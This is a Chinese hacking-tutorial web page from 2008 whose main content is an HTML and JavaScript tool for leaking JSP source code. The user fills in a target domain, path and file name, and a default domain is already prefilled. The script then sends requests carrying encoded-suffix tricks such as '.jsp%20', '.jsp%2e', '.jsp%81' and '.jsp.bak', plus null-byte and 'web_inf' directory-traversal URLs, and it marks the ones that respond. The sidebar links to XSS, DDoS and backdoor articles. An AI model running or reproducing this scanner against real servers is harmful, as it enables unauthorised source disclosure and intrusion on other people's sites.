首页  登陆  注册  博客集  下载频道  网络硬盘  学院论坛  家园
IT学院 网站地图 网站地图
收藏本站 收藏本站
高级搜索 高级搜索
 新闻IT新闻 互联网 微软 黑客新闻 网络网络协议 故障 网络管理 TCP/IP 无线技术 解决方案 黑客技术 漏洞 软件评测 安全资讯
 数据MSsql Oracle Mysql PL/SQL 备份 系统:Linux vista Windows FTP 防火墙 注册表 服务器行情 服务器应用 解决方案 WEB服务器
 墙纸风景壁纸 游戏壁纸 体育壁纸 汽车壁纸 人文壁纸 影视壁纸 广告壁纸 花卉壁纸 节日壁纸 动漫壁纸 明星壁纸 绘画壁纸 月历壁纸
当前位置: > 主页>网络攻防>黑客技术>一个暴jsp源码的网页
热门文章排行
  
热门文章排行 XSS测试语句大全
反击黑客从这里开始
加密三剑客SSL、SET和PG
攻破网络的十二种常用方
sa弱口令强行入侵
Win2000 Server入侵监测
域名欺骗技术实现过程
通用密码后门
UNIX系统后门的安放和日
后门技术及rootkit工具-
精采文章推荐
  
精采文章推荐 小规模DDoS(拒绝服务)用
打造简单隐藏疯狂DDOS攻
用ASP实现反向连接控制
使用perl通过adsi接口导
详细讲解黑客常用的远程
二行代码解决全部网页木
判断cookies注入的js语
Metasploit渗透工具的应
利用Debug Api 获得QQ20
BBSXP绕过过滤继续注入
最新更新文章
  
最新更新文章 PERL铸造多线程+支持中
看黑客怎样汇编创建简单
破解数据库下载漏洞
利用sohu网站URL跳转漏
xdos.exe攻击器下载与使
DDoS攻击教程(3)
DDoS攻击教程(2)
DDoS攻击教程(1)
DOS攻击原理以及常见方
小规模DDoS(拒绝服务)用

一个暴jsp源码的网页

编辑:   来源:  日期:2008-03-07   我要投稿      家园
<head>
<base target="_blank">
</head>
<style>
BODY {FONT-FAMILY: "宋体", "宋体"; FONT-SIZE: 9pt; LINE-HEIGHT: 12pt}
BR {FONT-FAMILY: "宋体", "宋体"; FONT-SIZE: 9pt; LINE-HEIGHT: 12pt}
TD {FONT-FAMILY: "宋体"; FONT-SIZE: 9pt; LINE-HEIGHT: 12pt}
a {COLOR: #llccxx; text-decoration: none}
a:hover {color:#llccxx;text-decoration:none}
</style>
<center>
<pre>
海阳顶端网jsp暴源码及目录网页使用帮助:
第一个写域名;第二个写路径;第三个写文件名,注意不要加扩展名:
</pre>
<input type=text id=http size=28 style="border:1px solid #99CCdd; " value="http://www.ctm.net">
<input type=text id=path size=36 style="border:1px solid #99CCdd; " value="/cgi-bin/ctm/jsp/cn/NHS/demo/">
<input type=text id=cindex size=6 style="border:1px solid #99CCdd; " value="main">
<input type=button onclick=isExist(http.value) value="检测JSP源码及目录遍历" style="border:1px solid #99CCdd; ">
<div id="t"></div>
<script>
function isExist(url)
{
var myObject = new Object();
myObject.lcx1 = ".jsp.";
myObject.lcx2 = ".jsp+";
myObject.lcx3 = ".jsp%20";
myObject.lcx4 = ".jsp%2e";
myObject.lcx5 = ".jsp%70";
myObject.lcx6 = ".jsp%81";
myObject.lcx7 = ".jsp%2581";
myObject.lcx8 = ".JSP";
myObject.lcx9 = ".Jsp";
myObject.lcx10 = ".jsp.bak";
t.innerHTML+= "<br>目录遍历的方法,暂且收了这么多:<br><br>"
t.innerHTML+= "<a href=" +http.value+path.value+">"+http.value+path.value+"<br>";
t.innerHTML+= "<a href=" +http.value+path.value+"%00.jsp>"+http.value+path.value+"%00.jsp<br>";
t.innerHTML+= "<a href=" +http.value+path.value+"%3f.jsp>"+http.value+path.value+"%3f.jsp<br>";
t.innerHTML+= "<a href=" +http.value+path.value+"?.jsp>"+http.value+path.value+"?.jsp<br>";
t.innerHTML+= "<a href=" +http.value+path.value+"web_inf>"+http.value+path.value+"web_inf/<br><br>";
t.innerHTML+= "估计以下有个链接肯定存在暴源码或出错漏洞,俺可不是瞎说,没有漏洞俺不列,下雨阴天闲着也是闲着,挨个点一下看看吧:<br><br>";
for (lcx in myObject)
{
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP")
xmlhttp.open("GET",http.value+path.value+cindex.value+myObject[lcx],false)
xmlhttp.send()
if(xmlhttp.status==200)
t.innerHTML += "<font color=red><a href="+http.value+path.value+cindex.value+myObject[lcx]+">"+http.value+path.value+cindex.value+myObject[lcx]+"<br></font></a>";
else
t.innerHTML+= http.value+path.value+cindex.value+myObject[lcx]+"你白费心了,俺不存在漏洞,不用点<br>";
}
}
</script>
</center>


上一篇:判断cookies注入的js语句  
下一篇:基于SNMP协议的电信网络监测系统的实现
 关键字:  
文章评论】 【收藏本文】 【推荐好友】 【打印本文】 【论坛讨论

   相关文章:

   文章评论:(0条)
  
 请留名: 匿名评论   点击查看所有评论
 

  责任编辑:IT学院  声明:刊登此文章是为了传递更多信息,文章内容仅供参考,转载请注明出处。